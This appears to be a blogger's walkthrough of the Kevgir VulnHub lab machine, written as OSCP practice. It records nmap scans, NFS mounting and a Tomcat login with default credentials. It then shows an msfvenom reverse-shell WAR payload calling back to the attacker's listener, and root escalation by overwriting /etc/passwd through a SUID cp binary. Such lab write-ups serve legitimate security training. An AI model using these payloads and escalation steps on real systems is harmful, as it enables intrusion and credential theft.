The machine

This machine is one of the machines from the OSCP preparation guide I received from one of my teachers. This machine is the next on list and it can be downloaded on: vulnhub

The challenge

The challenge or goal of the machine lists the following:

Kevgir has designed by canyoupwnme team for training, hacking practices and exploiting. Kevgir has lots of vulnerable services and web applications for testing. We are happy to announced that.

https://www.vulnhub.com/entry/kevgir-1,137/

Walk-through

The walk-through will be divided in a couple sections following the standard penetration testing process: Information gathering –> Exploitation –> Post exploitation. It could be divided into more steps, but for complicity we do these three.

Information gathering

To start of we will find the IP address of the machine with nmap since netdiscover takes a while on my VMware. We will use the command sudo nmap -sn 192.168.0.0/24 for this. The vulnerable machine has the IP 192.168.0.138.

So to start of the machine we scan the machine for open ports with nmap. We will do two scans; sudo nmap -sV -sC 192.168.0.138 -oA nmap and sudo nmap -sV -sC -p- 192.168.0.138 -oA fullnmap. We use these parameters for;
-sV service and version enumeration,
-sC is for basic script usage.
-p- to do a full port scan.
-oA to save all output to a couple different files.

The nmap results are;

# Nmap 7.80 scan initiated Tue Feb 18 13:46:13 2020 as: nmap -sV -sC -oA nmap 192.168.0.138
Nmap scan report for 192.168.0.138
Host is up (0.000068s latency).
Not shown: 990 closed ports
PORT     STATE SERVICE     VERSION
25/tcp   open  ftp         vsftpd 3.0.2
|_smtp-commands: SMTP: EHLO 530 Please login with USER and PASS.\x0D
80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Kevgir VM
111/tcp  open  rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100003  2,3,4       2049/udp   nfs
|   100003  2,3,4       2049/udp6  nfs
|   100005  1,2,3      32979/udp6  mountd
|   100005  1,2,3      37206/tcp   mountd
|   100005  1,2,3      47667/tcp6  mountd
|   100005  1,2,3      48358/udp   mountd
|   100021  1,3,4      37042/tcp6  nlockmgr
|   100021  1,3,4      37283/udp   nlockmgr
|   100021  1,3,4      37795/udp6  nlockmgr
|   100021  1,3,4      56540/tcp   nlockmgr
|   100024  1          44928/udp   status
|   100024  1          52040/tcp   status
|   100024  1          52398/tcp6  status
|   100024  1          53714/udp6  status
|   100227  2,3         2049/tcp   nfs_acl
|   100227  2,3         2049/tcp6  nfs_acl
|   100227  2,3         2049/udp   nfs_acl
|_  100227  2,3         2049/udp6  nfs_acl
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.1.6-Ubuntu (workgroup: WORKGROUP)
1322/tcp open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 17:32:b4:85:06:20:b6:90:5b:75:1c:6e:fe:0f:f8:e2 (DSA)
|   2048 53:49:03:32:86:0b:15:b8:a5:f1:2b:8e:75:1b:5a:06 (RSA)
|   256 3b:03:cd:29:7b:5e:9f:3b:62:79:ed:dc:82:c7:48:8a (ECDSA)
|_  256 11:99:87:52:15:c8:ae:96:64:73:d6:49:8c:d7:d7:9f (ED25519)
2049/tcp open  nfs_acl     2-3 (RPC #100227)
8080/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
| http-methods: 
|_  Potentially risky methods: PUT DELETE
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat
8081/tcp open  http        Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Joomla! 1.5 - Open Source Content Management
| http-robots.txt: 14 disallowed entries 
| /administrator/ /cache/ /components/ /images/ 
| /includes/ /installation/ /language/ /libraries/ /media/ 
|_/modules/ /plugins/ /templates/ /tmp/ /xmlrpc/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Welcome to the Frontpage
9000/tcp open  http        Jetty winstone-2.9
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Jetty(winstone-2.9)
|_http-title: Dashboard [Jenkins]
MAC Address: 00:0C:29:A2:8E:AF (VMware)
Service Info: Host: CANYOUPWNME; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 19m59s, deviation: 1h09m16s, median: 59m58s
|_nbstat: NetBIOS name: CANYOUPWNME, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Unix (Samba 4.1.6-Ubuntu)
|   Computer name: canyoupwnme
|   NetBIOS computer name: CANYOUPWNME\x00
|   Domain name: 
|   FQDN: canyoupwnme
|_  System time: 2020-02-18T21:46:24+02:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-02-18T19:46:24
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Feb 18 13:46:29 2020 -- 1 IP address (1 host up) scanned in 16.11 seconds

Well that is a lot of ports. To keep it short we got the following ports:
– 25 ftp which includes a user in the banner
– 80 apache httpd
– 111 with some possible nfs sahres, which we might be able to mount
– 139, 445 netbio samba
– 1322 ssh
– 2049 rpc
– 8080 apache tomcat
– 8081 apache
– 9000 http Jetty

We start with the ftp port since we might have a user and there might be some files with more information. We can not login with USER and PASS or Anonymous. It is asking for our USER and PASS which we need to supply in Telnet. Well I learned something I guess haha :p

On port 80 we got a pretty empty webserver/webpage. But to be sure we can run nikto to find possible vulnerabilties and dirb to fuzz directories. We will run nikto -host http://192.168.0.138 -output nikto.txt and dirb http://192.168.0.138 -o dirb.txt. So lets have a look at the results:

We found a /phpmyadmin/ directory. We tried some basic credentials but we couldn’t login. We got the message 1045 Cannot log in to the MySQL server every time we tried to login. I googled the error message and it seems the mysql server is down or there is no account set. No problem. Not going to dive to deep into this. There is a lot more to explore!

Lets see port 111 since we have a lot more with the rpcbind then on other machines. I may finally get to test this a bit. With the command showmount -e 192.168.0.138 we see that there is a /backup directory mountable. With the command mount -t nfs 192.168.0.138:/backup /tmp/backupmount we can mount the /backup directory. -t is used to set the type to nfs. 192.168.0.138:/backup is the share we want to mount, and /tmp/backupmount is where we want to mount it to. In the directory is a file named backup.tar.bz2.zip. Seems to be compressed a couple times.

I tried unzipping the file but it has been password protected. Some basic passwords did not work! We may find some passwords later, I don’t feel like bruteforcing it at the moment.

There are some other webservices running. There should be tomcat on port 8080. Lets run another Dirb and Nikto scan, like we did before on port 80. This are the results:

We found a couple manager directories. All password protected but I managed to login with tomcat:tomcat in /manager, /host-manager, /manager/status. This is a good start. Lets find a possible exploit!

Exploitation

To exploit TomCat I found several metasploit modules which can abuse the /manager deployer or upload. I’m not interested in using metasploit at the moment.

so lets google to find a way to exploit since there is an upload availability for deploying a directory file, XML file or WAR file.

This guide show the metasploit way, but also a way to generate a war file with msfvenom. No idea this was possible, awesome! Lets do it!!! We can do this with the following payload: msfvenom -p java/shell_reverse_tcp lhost=192.168.0.129 lport=1234 -f war -o ~/kevgir/exploit.war. We can now upload the file in the WAR file deploy section, start our listener and click on the /exploit directory. We can start our listener with nc -lvp 1234 and click on the /exploit directory in the tomcat manager. And we got a shell as the tomcat user!

Privilege escalation

I’m not going to write all the things I try during my priv escalation. But if I find something that doesn’t work I will write it down. A good guide to find possible privilege escalation is this one from g0tmi1k.

I found a priv escalation way through an kernal exploit. But this normally isn’t the way intended for a vulnerable machine, so to learn more we will look for something else. But it should be possible since it is running an old Ubuntu version and kernel.

I got a full tty shell with the following command: python -c 'import pty; pty.spawn("/bin/bash")'

vsftpd,smbd and rpcbind is running as root (ps aux | grep root)

In the /var/www/html/ folder we found a file configaration.php which contains the database credentials and a server secret. In the database we found the administrator password hash for joomla:

Hash-identiefier tells us it is an md5 hash with a salt. Lets try to crack this online. Did not found anything since there is a salt. Tried cracking it with hashcat and rockyou.txt but no luck. I was bruteforcing it but it ran for a bit and I had no luck.

SUID BITS

With the command find /bin -perm -4000, I found a SUIT bit set on CP. So we can copy any file as root? I copied the /etc/shadow file to /tmp/shadow to check if it worked. And we could see it:

Interesting, I think I can copy the /etc/passwd file to /tmp/passwd. To exploit this file we have to do the following:
Generate an hash for a password with openssl passwd foo where the password is foo. The hash is 7kTk8t7eAN5xQ.
Then we cat the /etc/passwd file and copy the root entry: root:x:0:0:root:/root:/bin/bash
Then we edit this entry with another username but the same ID, so we can login with it, and we replace the x with the hash. So we get: roott:7kTk8t7eAN5xQ:0:0:root:/root:/bin/bash. But we can not echo this to /etc/passwd this, since the permissions are not right! I should have checked for it before I did this all. 4 -rw-r--r-- 1 root tomcat7 1446 Feb 18 23:52 passwd.

I went around this by catting the output to another file named passwd in another directory and echo the new line for passwd roott:7kTk8t7eAN5xQ:0:0:root:/root:/bin/bash to /tmp/test/passwd. Then we can copy this /tmp/test/passwd file to /etc/passwd with the SUID bit set op cp.

Flag

Leave a Reply

Your email address will not be published. Required fields are marked *